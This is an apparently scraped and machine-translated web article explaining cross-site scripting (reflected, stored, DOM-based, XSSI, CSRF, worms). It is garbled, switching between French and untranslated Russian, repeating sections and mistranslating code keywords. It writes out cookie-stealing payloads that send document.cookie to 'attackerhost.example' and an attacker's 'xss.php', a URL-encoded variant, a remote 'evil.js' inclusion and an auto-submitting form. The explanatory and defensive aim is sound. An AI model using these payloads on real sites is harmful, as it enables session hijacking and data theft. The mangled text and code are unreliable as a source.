Protection contre les attaques xss. Qu'est-ce qu'une vulnérabilité XSS. Codage côté client

Tout le monde sait depuis longtemps ce qu'est XSS et comment s'en protéger, je serai donc bref. XSS est la capacité d'un attaquant d'une certaine manière (voir le lien pour les options possibles à la fin de l'article) à intégrer un script dans la page du site Web de la victime qui sera exécuté lors de sa visite.

Fait intéressant, dans la plupart des cas où cette vulnérabilité est décrite, ils nous font peur avec le code suivant :

http://www.site.com/page.php?var= alertscript› alerte ("xss");

D'une certaine manière pas très effrayant :) En quoi cette vulnérabilité peut-elle vraiment être dangereuse ?

Passif et actif

Il existe deux types de vulnérabilités XSS : passives et actives.

Vulnérabilité active plus dangereux, puisque l'attaquant n'a pas besoin d'attirer la victime à l'aide d'un lien spécial, il lui suffit d'injecter le code dans la base de données ou un fichier sur le serveur. Ainsi, tous les visiteurs du site deviennent automatiquement des victimes. Il peut être intégré, par exemple, à l'aide de SQL Injection. Par conséquent, vous ne devez pas faire confiance aux données stockées dans la base de données, même si elles ont été traitées lors de l'insertion.

Exemple vulnérabilité passive se trouve au tout début de l'article. L'ingénierie sociale est déjà nécessaire ici, par exemple, une lettre importante de l'administration du site avec une demande de vérifier les paramètres de votre compte après la restauration à partir d'une sauvegarde. En conséquence, vous devez connaître l'adresse de la victime, ou tout simplement organiser un envoi de spam ou un message sur un forum, et même pas le fait que les victimes seront naïves et cliqueront sur votre lien.

De plus, les paramètres POST et GET peuvent être soumis à une vulnérabilité passive. Avec les paramètres POST, bien sûr, vous devez opter pour quelques astuces. Par exemple, la redirection depuis le site Web de l'attaquant.

">

Par conséquent, la vulnérabilité GET est un peu plus dangereuse, puisque il est plus facile pour la victime de remarquer le mauvais domaine que le paramètre facultatif (bien que l'url puisse être entièrement encodée).

Voler des cookies

C'est l'exemple le plus fréquemment cité d'attaque XSS. Dans les Cookies, les sites stockent parfois des informations précieuses (parfois même le nom d'utilisateur et le mot de passe (ou son hachage) de l'utilisateur), mais le plus dangereux est le vol d'une session active, alors n'oubliez pas de cliquer sur le lien "Quitter" sur les sites, même s'il s'agit d'un ordinateur personnel. Heureusement, sur la plupart des ressources, la durée de vie de la session est limitée.

var mg = nouvelle image (); mg.srс = "http: //site/xss.php?" + document.cookie ;

Par conséquent, nous avons introduit des restrictions de domaine sur XMLHttpRequest, mais un attaquant n'a pas peur, car il y a , <img>, <script>, background:url(); и т.п.</p><h3>Кража данных из форм</h3><p>Ищем форму через, например, getElementById и отслеживаем событие onsubmit. Теперь, перед отправкой формы, введенные данные отправляются также и на сервер злоумышленника.</p><p>Этот тип атаки чем-то напоминает фишинг, только используется не поддельный сайт, а реальный, чем вызывается большее доверие жертвы.</p><h3>DDoS-атака (распределенная атака типа «отказ в обслуживании»)</h3><p>XSS-уязвимость на многопосещаемых ресурсах может быть использована для проведения DDoS-атаки. Суть проста - много запросов, которые не выдерживает атакуемый сервер.<br> Собственно отношение к XSS имеет косвенное, поскольку скрипты могут и не использоваться вовсе, достаточно конструкции вида:</p><h3>Подделка межсайтовых запросов (CSRF/XSRF)</h3><p>Также имеет косвенное отношение к XSS. Вообще это отдельный тип уязвимости, но часто используется совместно с XSS. Суть заключается в том, что пользователь, авторизированный на неуязвимом сайте, заходит на уязвимый (или специальную страницу злоумышленника), с которого отправляется запрос на совершение определенных действий.</p><p>Грубо говоря, в идеале это должно быть так. Пользователь авторизировался в системе платежей. Потом зашел на сайт злоумышленника или сайт с XSS-уязвимостью, с которого отправился запрос на перевод денег на счет злоумышленника.</p><p>Поэтому большинство сайтов при совершении определенных действий пользователя (например, смена e-mail) переспрашивают пароль или просят ввести код подтверждения.</p><h3>XSS-черви</h3><p>Этот тип атаки появился, наверное, благодаря соцсетям, таким как Вконтакте и Twitter. Суть в том, что нескольким пользователям соцсети посылается ссылка с XSS-уязвимостью, когда они перейдут по ссылке, то интегрированный скрипт рассылает сообщения другим пользователям от их имени и т.д. При этом могут совершаться и другие действия, например отсылка личных данных жертв злоумышленнику.</p><h3>Безобидный XSS</h3><p>Интересно, что счетчики по своей сути тоже являются в некотором роде активной XSS-атакой. Ведь на сторонний сервер передаются данные о посетителе, как, например, его IP-адрес, разрешение монитора и т.п. Только код в свою страничку вы интегрируете по собственной воле:) Взгляните, например, на код Google Analytic.</p> <p>Межсайтовый скриптинг (сокращенно XSS) - широко распространенная уязвимость, затрагивающая множество веб-приложений. Она позволяет злоумышленнику внедрить вредоносный код в веб-сайт таким образом, что браузер пользователя, зашедшего на сайт, выполнит этот код.</p> <p>Обычно для эксплуатации подобной уязвимости требуется определенное взаимодействие с пользователем: либо его заманивают на зараженный сайт при помощи социальной инженерии, либо просто ждут, пока тот сам посетит данный сайт. Поэтому разработчики часто не воспринимают всерьез XSS-уязвимости.</p> <p>Но если их не устранять, это может нести серьезную угрозу безопасности.</p> <p>Представим, что мы находимся в панели администратора WordPress, добавляем новый контент. Если мы используем для этого уязвимый к XSS плагин, он может заставить браузер создать нового администратора, видоизменить контент и выполнить другие вредоносные действия. Межсайтовый скриптинг предоставляет злоумышленнику практически полный контроль над самым важным программным обеспечением в наши дни - браузером.</p> <h2>XSS: Уязвимость для инъекции</h2> <p>Любой веб-сайт или приложение имеет несколько мест ввода данных -полей формы до самого URL. Простейший пример вводимых данных - когда мы вписываем имя пользователя и пароль в форму:</p> <p><img src='https://i0.wp.com/info-business.pro/wp-content/uploads/2017/01/screen-shot.png' align="center" width="100%" loading=lazy loading=lazy></p> <p>Наше имя будет храниться в базе данных сайта для последующего взаимодействия с нами. Наверняка, когда вы проходили авторизацию на каком-либо сайте, вы видели персональное приветствие в стиле «Добро пожаловать, Илья».</p> <p>Именно для таких целей имена пользователей хранятся в базе данных.</p> <p>Инъекцией называется процедура, когда вместо имени или пароля вводится специальная последовательность символов, заставляющая сервер или браузер отреагировать определенным, нужным злоумышленнику образом.</p> <p>Межсайтовым скриптингом называется инъекция, внедряющая код, который будет выполнять действия в браузере от имени веб-сайта. Это может происходить как с уведомлением пользователя, так и в фоновом режиме, без его ведома.<br><br><img src='https://i1.wp.com/info-business.pro/wp-content/uploads/2017/01/xss-example-flow-diagram1.png' align="center" width="100%" loading=lazy loading=lazy></p> <h2>Традиционные XSS-атаки:</h2> <h4>Отраженные (непостоянные).</h4> <p>Отраженная XSS-атака срабатывает, когда пользователь переходит по специально подготовленной ссылке.</p> <p>Эти уязвимости появляются, когда данные, предоставленные веб-клиентом, чаще всего в параметрах HTTP-запроса или в форме HTML, исполняются непосредственно серверными скриптами для синтаксического анализа и отображения страницы результатов для этого клиента, без надлежащей обработки.</p> <h4>Хранимые (постоянные).</h4> <p>Хранимые XSS возможны, когда злоумышленнику удается внедрить на сервер вредоносный код, выполняющийся в браузере каждый раз при обращении к оригинальной странице. Классическим примером этой уязвимости являются форумы, на которых разрешено оставлять комментарии в HTML-формате.</p> <h2>Уязвимости, вызванные кодом на стороне клиента (JavaScript, Visual Basic, Flash и т. д.):</h2> <h3>Также известные как DOM-модели:</h3> <h4>Отраженные (непостоянные).</h4> <p>То же самое, что и в случае с серверной стороной, только в этом случае атака возможна благодаря тому, что код обрабатывается браузером.</p> <h4>Хранимые (постоянные).</h4> <p>Аналогичны хранимым XSS на стороне сервера, только в этом случае вредоносная составляющая сохраняется на клиентской стороне, используя хранилище браузера.</p> <h2>Примеры XSS уязвимостей.</h2> <p>Интересно, что в большинстве случаев, где описывается данная уязвимость, нас пугают следующим кодом:</p><p>Http://www.site.com/page.php?var=<script>alert("xss");</script> </p><p>Il existe deux types de vulnérabilités XSS : passives et actives.</p> <p><i>Vulnérabilité active</i> plus dangereux, puisque l'attaquant n'a pas besoin d'attirer la victime à l'aide d'un lien spécial, il lui suffit d'injecter le code dans la base de données ou un fichier sur le serveur. Ainsi, tous les visiteurs du site deviennent automatiquement des victimes. Il peut être intégré, par exemple, à l'aide de SQL Injection. Par conséquent, vous ne devez pas faire confiance aux données stockées dans la base de données, même si elles ont été traitées lors de l'insertion.</p> <p>Exemple <i>vulnérabilité passive</i> se trouve au tout début de l'article. L'ingénierie sociale est déjà nécessaire ici, par exemple, une lettre importante de l'administration du site avec une demande de vérifier les paramètres de votre compte après la restauration à partir d'une sauvegarde. En conséquence, vous devez connaître l'adresse de la victime, ou tout simplement organiser un envoi de spam ou un message sur un forum, et même pas le fait que les victimes seront naïves et cliqueront sur votre lien.</p> <p>De plus, les paramètres POST et GET peuvent être soumis à une vulnérabilité passive. Avec les paramètres POST, bien sûr, vous devez opter pour quelques astuces. Par exemple, la redirection depuis le site Web de l'attaquant.</p><p> <form method="post" action="http://site.com/page.php"> </p><p><input type="hidden" name="var" value="<# - NOTRANS11 - #>"></p> <p><script type="text/javascript"> document.getElementsByTagName("form").submit(); </script></p> <p>Par conséquent, la vulnérabilité GET est un peu plus dangereuse, puisque il est plus facile pour la victime de remarquer le mauvais domaine que le paramètre facultatif (bien que l'url puisse être entièrement encodée).</p> <h3>Voler des cookies</h3> <p>C'est l'exemple le plus fréquemment cité d'attaque XSS. Dans les Cookies, les sites stockent parfois des informations précieuses (parfois même le nom d'utilisateur et le mot de passe (ou son hachage) de l'utilisateur), mais le plus dangereux est le vol d'une session active, alors n'oubliez pas de cliquer sur le lien "Quitter" sur les sites, même s'il s'agit d'un ordinateur personnel. Heureusement, sur la plupart des ressources, la durée de vie de la session est limitée.</p><p>Var mg = nouvelle image (); mg.srс = "http: //site/xss.php?" + document.cookie ;</p><p>Par conséquent, nous avons introduit des restrictions de domaine sur XMLHttpRequest, mais un attaquant n'a pas peur, car il y a <iframe>, <img>, <script>, background:url(); и т.п.</p> <h3>Кража данных из форм</h3> <p>Ищем форму через, например, getElementById и отслеживаем событие onsubmit. Теперь, перед отправкой формы, введенные данные отправляются также и на сервер злоумышленника.</p> <p>Этот тип атаки чем-то напоминает фишинг, только используется не поддельный сайт, а реальный, чем вызывается большее доверие жертвы.</p> <h3>DDoS-атака (распределенная атака типа «отказ в обслуживании»)</h3> <p>XSS-уязвимость на многопосещаемых ресурсах может быть использована для проведения DDoS-атаки. Суть проста - много запросов, которые не выдерживает атакуемый сервер.<br> Собственно отношение к XSS имеет косвенное, поскольку скрипты могут и не использоваться вовсе, достаточно конструкции вида:</p><p> <img src='https://i0.wp.com/site.com/' loading=lazy loading=lazy> </p><h2>В чем опасность XSS?</h2> <p>Как можно защитить свой сайт от XSS? Как проверить код на наличие уязвимости? Существуют технологии вроде Sucuri Firewall, специально разработанные для того, чтобы избежать подобных атак. Но если вы разработчик, вы, безусловно, захотите узнать подробнее, как идентифицировать и устранить XSS-уязвимости.</p> <p>Об этом мы поговорим в следующей части статьи, посвященной XSS.</p> <p>Что такое XSS-уязвимость? Стоит ли ее опасаться?</p> <p>Межсайтовый скриптинг (сокращенно XSS) - широко распространенная уязвимость, затрагивающая множество веб-приложений. Она позволяет злоумышленнику внедрить вредоносный код в веб-сайт таким образом, что браузер пользователя, зашедшего на сайт, выполнит этот код.</p> <p>Обычно для эксплуатации подобной уязвимости требуется определенное взаимодействие с пользователем: либо его заманивают на зараженный сайт при помощи социальной инженерии, либо просто ждут, пока тот сам посетит данный сайт. Поэтому разработчики часто не воспринимают всерьез XSS-уязвимости. Но если их не устранять, это может нести серьезную угрозу безопасности.</p> <p>Представим, что мы находимся в панели администратора WordPress, добавляем новый контент. Если мы используем для этого уязвимый к XSS плагин, он может заставить браузер создать нового администратора, видоизменить контент и выполнить другие вредоносные действия.</p> <p>Межсайтовый скриптинг предоставляет злоумышленнику практически полный контроль над самым важным программным обеспечением в наши дни - браузером.</p> <h2> XSS: Уязвимость для инъекции</h2> <p>Любой веб-сайт или приложение имеет несколько мест ввода данных -полей формы до самого URL. Простейший пример вводимых данных - когда мы вписываем имя пользователя и пароль в форму:</p> <p><b>Рисунок 1. Форма ввода данных </b></p> <p>Наше имя будет храниться в базе данных сайта для последующего взаимодействия с нами. Наверняка, когда вы проходили авторизацию на каком-либо сайте, вы видели персональное приветствие в стиле «Добро пожаловать, Илья». Именно для таких целей имена пользователей хранятся в базе данных.</p> <p>Инъекцией называется процедура, когда вместо имени или пароля вводится специальная последовательность символов, заставляющая сервер или браузер отреагировать определенным, нужным злоумышленнику образом.</p> <p>Межсайтовым скриптингом называется инъекция, внедряющая код, который будет выполнять действия в браузере от имени веб-сайта. Это может происходить как с уведомлением пользователя, так и в фоновом режиме, без его ведома.</p> <p><b>Рисунок 2. Наглядная схема межсайтового скриптинга </b></p> <p><img src='https://i2.wp.com/anti-malware.ru/files/xss-example-flow-diagram1.png' width="100%" loading=lazy loading=lazy></p> <p>В качестве простейшего примера можно привести элементарный скрипт, показывающий окно с уведомлением. Выглядит он примерно так:</p> <p><b>Таблица 1. Скрипт, вызывающий всплывающее окно </b></p> <p><script>alert(" ЭТО <span>XSS- </span>УЯЗВИМОСТЬ !!!")</script> </p> <p>Ce script appelle une fenêtre avec l'inscription "THIS IS XSS VULNERABILITY !!!". Le navigateur de l'utilisateur perçoit et exécute ce script dans le cadre du code légitime du site.</p> <h2>Types de vulnérabilités XSS</h2> <p>Toutes les vulnérabilités XSS ne sont pas identiques ; il en existe de nombreux types. Voici les types et comment ils interagissent :</p> <p><b>Figure 3. Types de vulnérabilités XSS</b></p> <p><b><br><img src='https://i1.wp.com/anti-malware.ru/files/sucuri-blog-xss-types.png' width="100%" loading=lazy loading=lazy></b></p> <p><b>Vulnérabilités causées par le code côté serveur (Java, PHP, .NET, etc.) :</b></p> <p>Attaques XSS traditionnelles :</p> <ol><li>Réfléchi (impermanent). Une attaque XSS réfléchie est déclenchée lorsqu'un utilisateur clique sur un lien spécialement préparé. Ces vulnérabilités se produisent lorsque les données fournies par un client Web, le plus souvent sous forme de paramètres de requête HTTP ou sous forme HTML, sont exécutées directement par des scripts côté serveur pour analyser et afficher une page de résultats pour ce client, sans traitement approprié.</li> <li>Stocké (persistant). Le XSS stocké est possible lorsqu'un attaquant est capable d'injecter du code malveillant dans un serveur qui s'exécute dans le navigateur à chaque accès à la page d'origine. Un exemple classique de cette vulnérabilité est les forums où les commentaires HTML sont autorisés.</li> </ol><p><b>Vulnérabilités causées par le code côté client (JavaScript, Visual Basic, Flash, etc.) :</b></p> <p>Également appelés modèles DOM :</p> <ol><li>Réfléchi (impermanent). Comme dans le cas du côté serveur, seulement dans ce cas l'attaque est possible du fait que le code est traité par le navigateur.</li> <li>Stocké (persistant). Semblable au XSS stocké côté serveur, ce n'est que dans ce cas que le composant malveillant est stocké côté client à l'aide du stockage du navigateur.</li> </ol><p><b>Vulnérabilités de l'infrastructure (navigateur, plugins, serveurs, etc.) :</b></p> <p>Ils sont très rares, mais ils sont plus dangereux :</p> <ol><li>Infrastructure côté client. Se produit lorsqu'un composant malveillant effectue une quelconque manipulation des fonctionnalités du navigateur, par exemple, son filtre XSS, etc.</li> <li>Infrastructure côté serveur. Se produit lorsqu'un serveur Web ne traite pas correctement les demandes, ce qui permet de les modifier.</li> <li>Réseau. Se produit lorsqu'il est possible d'infiltrer la communication entre un client et un serveur.</li> </ol><p><b>Vulnérabilités induites par l'utilisateur :</b></p> <ol><li>Auto-XSS. Cela se produit souvent à la suite de l'ingénierie sociale, lorsqu'un utilisateur exécute accidentellement un code malveillant dans son navigateur.</li> </ol><h2>Quel est le danger du XSS ?</h2> <p>Comment protéger votre site du XSS ? Comment vérifier le code pour les vulnérabilités ? Il existe des technologies comme le pare-feu Sucuri qui sont spécialement conçues pour éviter de telles attaques. Mais si vous êtes développeur, vous voudrez certainement en savoir plus sur la façon d'identifier et de corriger les vulnérabilités XSS. Nous en reparlerons dans la prochaine partie de l'article sur XSS.</p> <p><b>Script intersites</b> ou XSS. Scripts intersites (scripts intersites).</p> <p>La vulnérabilité Cross-site Scripting permet à un attaquant de transmettre du code exécutable au serveur, qui sera redirigé vers le navigateur de l'utilisateur. Ce code est généralement écrit en HTML / JavaScript, mais VBScript, ActiveX, Java, Flash ou d'autres technologies prises en charge par les navigateurs peuvent être utilisés.</p> <p>Le code soumis est exécuté dans le contexte de sécurité (ou zone de sécurité) du serveur vulnérable. En utilisant ces privilèges, le code est capable de lire, modifier ou transmettre des données sensibles accessibles via le navigateur. L'utilisateur attaqué peut avoir un compte compromis (vol de cookie), son navigateur peut être redirigé vers un autre serveur, ou le contenu du serveur peut être substitué. À la suite d'une attaque soigneusement planifiée, un attaquant peut utiliser le navigateur de la victime pour afficher les pages du site au nom de l'utilisateur attaqué. Le code peut être transmis par un attaquant dans l'URL, dans les entêtes et la structure du protocole de requête HTTP (Cookie, user-agent, référent), dans les valeurs des champs de formulaire, etc.</p> <p>Il existe trois types d'attaques de scripts intersites : <b>non persistant non persistant</b>(reflété), <b>persistant persistant</b>(enregistré) et basé sur DOM. La principale différence entre persistant et non persistant est que dans la version réfléchie, le transfert du code vers le serveur et son retour au client sont effectués dans une requête HTTP et dans celle stockée - dans des requêtes différentes.</p> <p>La mise en œuvre d'une attaque non persistante nécessite que l'utilisateur suive le lien généré par l'attaquant (le lien peut être envoyé par email, ICQ, etc.). Dans le processus de chargement du site, le code intégré dans l'URL ou les en-têtes de requête sera transmis au client et exécuté dans son navigateur.</p> <p>Une vulnérabilité persistante se produit lorsque le code est transmis à un serveur et y est stocké pendant un certain temps. Les cibles les plus populaires dans ce cas sont les forums, la messagerie Web et les salles de discussion. Pour une attaque, l'utilisateur n'a pas besoin de suivre le lien, il suffit de visiter le site vulnérable.</p> <ul><p><b>Exemple. Attaque persistante.</b> De nombreux sites ont des babillards électroniques et des forums qui permettent aux utilisateurs de publier. Un utilisateur enregistré est généralement identifié par un numéro</p> </ul><p>session stockée dans un cookie. Si un attaquant laisse un message contenant du code JavaScript, il aura accès à l'ID de session de l'utilisateur. Exemple de code pour transmettre les cookies :</p><p> <SCRIPT>document.location= "http://attackerhost.example/cgi- bin/cookiesteal.cgi?"+document.cookie</SCRIPT> </p><ul><p><b>Exemple. Variante réfléchie (non persistante) de l'attaque.</b> De nombreux serveurs offrent aux utilisateurs la possibilité de rechercher le contenu du serveur. En règle générale, la demande est transmise dans une URL et contenue dans la page résultante.</p> </ul><p>Par exemple, lorsqu'il clique sur l'URL http : //portal.example/search ? Q = "fresh beer", l'utilisateur verra une page contenant les résultats de la recherche et la phrase : "0 pages were found for your request for fresh Bière". Si Javascript est passé en tant que phrase de recherche, il sera exécuté dans le navigateur de l'utilisateur. Exemple:</p><p>Http : //portail.exemple/recherche/? Q =<script>alert("xss")</script> </p><p>L'encodage URLEncode peut être utilisé pour masquer le code du script</p><p>Http : //portal.example/index.php? Sessionid = 12312312 & nom d'utilisateur =% 3C% 73% 63% 72% 69% 70% 74% 3E% 64% 6F% 63% 75% 6D% 65% 6E% 74 % 2E% 6C% 6F% 63% 61% 74% 69% 6F% 6E% 3D% 27% 68% 74% 74% 70% 3A% 2F% 2F% 61% 74% 74% 61% 63% 6B% 65 % 72% 68% 6F% 73% 74% 2E% 65% 78% 61% 6D% 70% 6C% 65% 2F% 63% 67% 69% 2D% 62% 69% 6E% 2F% 63% 6F% 6F % 6B% 69% 65% 73% 74% 65% 61% 6C% 2E% 63% 67% 69% 3F% 27% 2B% 64% 6F% 63% 75% 6D% 65% 6E% 74% 2E% 63 % 6F% 6F% 6B% 69% 65% 3C% 2F% 73% 63% 72% 69% 70% 74% 3E</p> <h1>Flanagan David JavaScript</h1> <p><i>Extrait du livre de Flanagan David JavaScript The Complete Guide 5th Edition.</i></p> <p>Le terme cross "site scripting, ou XSS, fait référence à une zone de vulnérabilité informatique dans laquelle un attaquant injecte des balises HTML ou des scripts dans des documents sur un site Web vulnérable. Il est courant que les développeurs Web écrivent des scripts côté serveur pour se défendre contre XSS. Le développement de scripts JavaScript côté client doit également être conscient des attaques XSS et prendre des mesures de protection contre elles.</p> <p>Une page Web est considérée comme vulnérable aux attaques XSS si elle génère dynamiquement du contenu de document basé sur des données utilisateur qui n'ont pas été prétraitées pour supprimer le code HTML en ligne. À titre d'exemple trivial, considérons la page Web suivante qui utilise JavaScript pour accueillir un utilisateur par son nom :</p><p> <script> var name = decodeURIComponent(window.location.search.substring(6)) || ""; document.write("Привет " + name); </script> </p><p>La deuxième ligne du script appelle la méthode window.location.search.substring pour récupérer la partie de la barre d'adresse qui commence par le caractère ?. Le contenu du document généré dynamiquement est ensuite ajouté à l'aide de la méthode document.write(). Ce scénario suppose que la page Web sera accessible à l'aide d'une URL similaire à celle-ci :</p><p>Http://www.example.com/greet.html?name=David</p><p>Dans ce cas, le texte "Salut David" s'affichera. Mais que se passe-t-il si la page est demandée à l'aide de l'URL suivante :</p><p>Http://www.example.com/greet.html?name=%3Cscript%3Ealert("David")%3C/script%3E</p><p>Avec ce contenu URL, le script va générer dynamiquement un autre script (les codes% 3C et% 3E sont des chevrons) ! Dans ce cas, le script inséré affichera simplement une boîte de dialogue qui ne présente aucun danger. Mais imaginez ce cas :</p><p>Http : //siteA/greet.html?Name =% 3Cscript src = siteB / evil.js% 3E% 3C / script% 3E</p><p>Les scripts intersites sont appelés ainsi car plusieurs sites sont impliqués dans l'attaque. Le site B (ou même le site C) inclut un lien spécialement conçu (comme celui qui vient d'être montré) vers le site A, qui contient un script du site B. Le script evil.js est hébergé sur le site B de l'attaquant, mais maintenant ce script est intégré au site A et peut faire ce qu'il veut du contenu du site A. Il peut effacer la page ou provoquer d'autres perturbations du site (par exemple, un déni de service, qui est abordé dans la section suivante). Cela pourrait nuire aux visiteurs du site A. Il est bien plus dangereux qu'un tel script malveillant puisse lire le contenu des cookies stockés sur le site A (contenant éventuellement des numéros de compte ou d'autres informations personnelles) et renvoyer ces données au site B. Le le script intégré peut même être suivi des frappes et envoyer ces données au site B.</p> <p>Un moyen générique d'empêcher les attaques XSS consiste à supprimer les balises HTML de toutes les données douteuses avant de les utiliser pour générer dynamiquement le contenu d'un document. Pour résoudre ce problème dans le fichier greet.html affiché précédemment, ajoutez la ligne suivante au script pour supprimer les crochets angulaires qui entourent la balise<script>:</p><p>Name = name.replace(/</g, "<").replace(/>/g, ">"); </p><p>Межсайтовый скриптинг представляет собой уязвимость, глубоко уходящую корнями в архитектуру Всемирной паутины. Необходимо осознавать всю глубину этой уязвимости.</p> <p>Про возможность получения различной информации со сторонних сайтов с помощью простой атаки - Cross Site Scripting Inclusion (XSSI).</p> <p>Если ты читаешь Easy Hack систематически, то, наверное, уже хорошо знаком с Same Origin Policy (SOP), мы к нему часто возвращаемся. Из-за SOP возможность взаимодействия между двумя «сайтами» очень ограничена. Но так как задача получения и оправки информации на одном сайте с другого возникает часто, то были внедрены различные методы для «смягчения» политики и организации взаимодействия. Например, такие, как CORS или crossdomain.xml. Один из более старых методов - подгрузка JavaScript с другого домена через тег <script> . SOP нас здесь ничем не ограничивает: можно указать практически произвольное месторасположение.</p><p>К примеру, есть хост атакующего evil.ru и сайт жертвы - victim.com. На evil.ru мы можем положить файл HTML и сослаться на любой скрипт у жертвы:</p><p> <script src="http://victim.com/any_script_.js"></script> </p><p>Lorsqu'un utilisateur accède au site Web de l'attaquant, le navigateur télécharge et exécute JS à partir de victim.com, mais dans le contexte du SOP evil.ru. Cela signifie qu'à partir du JS de l'attaquant lui-même, nous pourrons accéder aux données (pas toutes) du JS du serveur de la victime.</p> <p>Par exemple, le contenu JS du site de la victime (http://victim.com/any_script_.js) :</p><p>Vara = "12345" ;</p><p>Ensuite, sur le site de l'attaquant, on peut récupérer la valeur de la variable :</p><p> <script src="http://victim.com/any_script_.js"></script> <script>console.log(a);</script> </p><p>L'idée de travail est aussi simple qu'une bouilloire en aluminium.</p> <p>En fait, la possibilité de charger du JS statique depuis d'autres sites ne pose pas plus de problèmes pour le site victime que le chargement d'une image.</p> <p>Des problèmes peuvent survenir lorsque le JS est généré dynamiquement, c'est-à-dire lorsque le contenu du script JS change en fonction des données du cookie, en fonction de l'utilisateur qui y accède. Par exemple, certaines informations "critiques" sont stockées dans JS : des informations personnelles (email, nom d'utilisateur sur le site de la victime) ou des informations techniques (tokens anti CSRF).</p> <p>Mais, comme nous le savons, lors du chargement du script via la balise<script> браузер пользователя автоматически отправляет cookie пользователя. Сложив эти факты, мы получаем возможность получать информацию о любом пользователе, который зашел на сайт атакующего и при этом залогинен на сайте-жертве.</p> <p>Что же мы можем узнать? Глобальные переменные и результаты работы глобальных функций. К сожалению, доступа к внутренним переменным/функциям нам не получить (хотя, возможно, кто-то найдет способ сделать и это).</p><p>Function test(){ return "private data frm function"; } </p><p>Такая атака выглядит возможной, но кажется, что она слишком проста и не должна быть распространенной. Этим и интересна презентация на Black Hat. Исследователи проанализировали 150 популярных сайтов и обнаружили, что в той или иной мере уязвима треть из них. Такая статистика заставляет взглянуть на проблему чуть более пристально.</p> <p>Была выявлена и еще одна закономерность. Content Security Policy становится все более распространенной. Как ты знаешь, с ней мы можем указать, с каких доменов может быть подгружен тот или иной ресурс. Например, можно сказать исполнять JS только с того же ресурса. Кроме того, лучшие практики настройки CSP подразумевают запрет на запуск inline JS (то есть кода, который находится прямо в HTML, а не подгружен из JS-файла).</p> <p>Однако перенос inline в файлы может быть сделан с костылями и на скорую руку - то есть посредством динамически генерируемых скриптов. Так как CSP никак не влияет на XSSI, мы опять-таки можем проводить наши атаки. Вот такая вот bad practice.</p> <script>document.write("<img style='display:none;' src='//counter.yadro.ru/hit;artfast_after?t44.1;r"+ escape(document.referrer)+((typeof(screen)=="undefined")?"": ";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth? screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+";h"+escape(document.title.substring(0,150))+ ";"+Math.random()+ "border='0' width='1' height='1' loading=lazy loading=lazy>");</script> </article> <div class="socialShare"> <script type="text/javascript" src="//yandex.st/share/share.js" charset="utf-8"></script> <div class="yashare-auto-init" data-yashareL10n="ru" data-yashareQuickServices="yaru,vkontakte,facebook,twitter,odnoklassniki,moimir,gplus" data-yashareTheme="counter"></div> </div> <div class="ads336"> </div> <div class="clear"></div> </section> <aside> <div class="rside newRelated"> <div class="related node mt25"> <div class="related"><a href='https://wisemotors.ru/fr/research/kak-opredelit-polnyi-nomer-telefona-po-korotkomu-kak-vospolzovatsya/'><img alt='Comment utiliser le service « Numéro de ville » de Beeline et connecter un numéro direct ?' src='/uploads/b0a4b7a8afe3b45e91f3e02158e26d40.jpg' loading=lazy loading=lazy><span>Comment utiliser le service « Numéro de ville » de Beeline et connecter un numéro direct ?</span></a></div> <div class="related"><a href='https://wisemotors.ru/fr/topics/megafon-zakryvaet-lishnie-salony-svyazi-perevod-na-drugie/'><img alt='Transfert vers d'autres tarifs Megafon continue... Comment bloquer votre numéro' src='/uploads/c7762dea60aca6fccbbf84b42fdfdc51.jpg' loading=lazy loading=lazy><span>Transfert vers d'autres tarifs Megafon continue... Comment bloquer votre numéro</span></a></div> <div class="related"><a href='https://wisemotors.ru/fr/iron/megafon-login-plyus-2-bolshe-chem-telefon-megafon-login-plyus-knigi-filmy/'><img alt='Plus qu'un téléphone - Megafon Login Plus' src='/uploads/dc1da7efba1176bbf85d193de0a3054c.jpg' loading=lazy loading=lazy><span>Plus qu'un téléphone - Megafon Login Plus</span></a></div> <div class="related"><a href='https://wisemotors.ru/fr/how-does-it-work--nfc-chip/preimushchestva-mobilnoi-svyazi-gudlain-gudlain-otzyvy/'><img alt='Avantages de la communication mobile goodline' src='/uploads/586b7cc4fcf6060aac89dfa0e031e61b.jpg' loading=lazy loading=lazy><span>Avantages de la communication mobile goodline</span></a></div> <div class="related"><a href='https://wisemotors.ru/fr/tv/kak-spisat-schastlivoe-vremya-na-bilain-schastlivoe-vremya-bilain/'><img alt='"Happy time" Beeline - programme de bonus du fournisseur' src='/uploads/c672a5a362d48c2beccf8ca2436c380d.jpg' loading=lazy loading=lazy><span>"Happy time" Beeline - programme de bonus du fournisseur</span></a></div> <div class="related"><a href='https://wisemotors.ru/fr/entertainment/skolko-nuzhno-zaryadit-novyi-telefon-kak-pravilno-zaryazhat/'><img alt='Comment bien charger son smartphone pour ne pas abîmer la batterie' src='/uploads/374f1d57d36247765a4bed4bf8bc9be2.jpg' loading=lazy loading=lazy><span>Comment bien charger son smartphone pour ne pas abîmer la batterie</span></a></div> </div> <div class="clear"></div> <div class="adsense_right"> </div> <div class="adsense_right mt25"> <noindex> <div id="smartrotator_ad_1220"></div> </noindex> </div> <div class="adsense_right mt20"> </div> </div> </aside> </div> <div class="clear"></div> </div> <div class="prefooter"> <span style="font-size:0.7em;">2021 wisemotors.ru. Comment ça fonctionne. Le fer. Exploitation minière. Crypto-monnaie.</span> </div> <footer> <div class="fitnes-social"> <div style="display:none;"></div> </div> <div id="vkcom"></div> </footer> </body> </html>